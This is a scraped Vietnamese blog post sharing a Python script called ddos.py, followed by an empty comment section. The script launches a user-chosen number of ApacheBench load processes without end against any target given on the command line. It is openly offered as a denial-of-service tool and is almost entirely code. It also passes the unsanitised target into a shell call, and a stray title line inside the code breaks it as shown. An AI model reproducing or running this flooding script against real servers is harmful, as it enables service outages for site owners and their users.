#!/usr/bin/env python
import sys
share code ddos .py

if len(sys.argv) < 3:
    sys.exit("Usage: ddos.py [spawn_limit] [target]")

import subprocess
limit = int(sys.argv[1])
server = sys.argv[2]
spawnlist = []

def new_process():
    return subprocess.Popen("ab -c50 -t60 -r " + server, shell=True, stdout=subprocess.PIPE)

def check_spawned():
    for t_obj in spawnlist:
        proc,pid = t_obj
        if not proc.poll() == None:
            print("-> hit: " + pid)
            x = spawnlist.index(t_obj)
            del spawnlist[x]

def need_more_ammo():
    return len(spawnlist) < limit

while True:
    while need_more_ammo():
        proc = new_process()
        pid = str(proc.pid)
        spawnlist.append((proc,pid))
        print("-> firing: " + str(proc.pid))
    check_spawned()

- 0 bình luận lượt xem

http://www.plusthuthuat.com/2015/08/share-code-ddos-py.html

BÌNH LUẬN (0)

Một số lưu ý khi bình luận

Mọi bình luận sai nội quy sẽ bị xóa mà không cần báo trước (xem nội quy)

Bấm Thông báo cho tôi bên dưới khung bình luận để nhận thông báo khi admin trả lời

Để bình luận một đoạn code, hãy mã hóa code trước nhé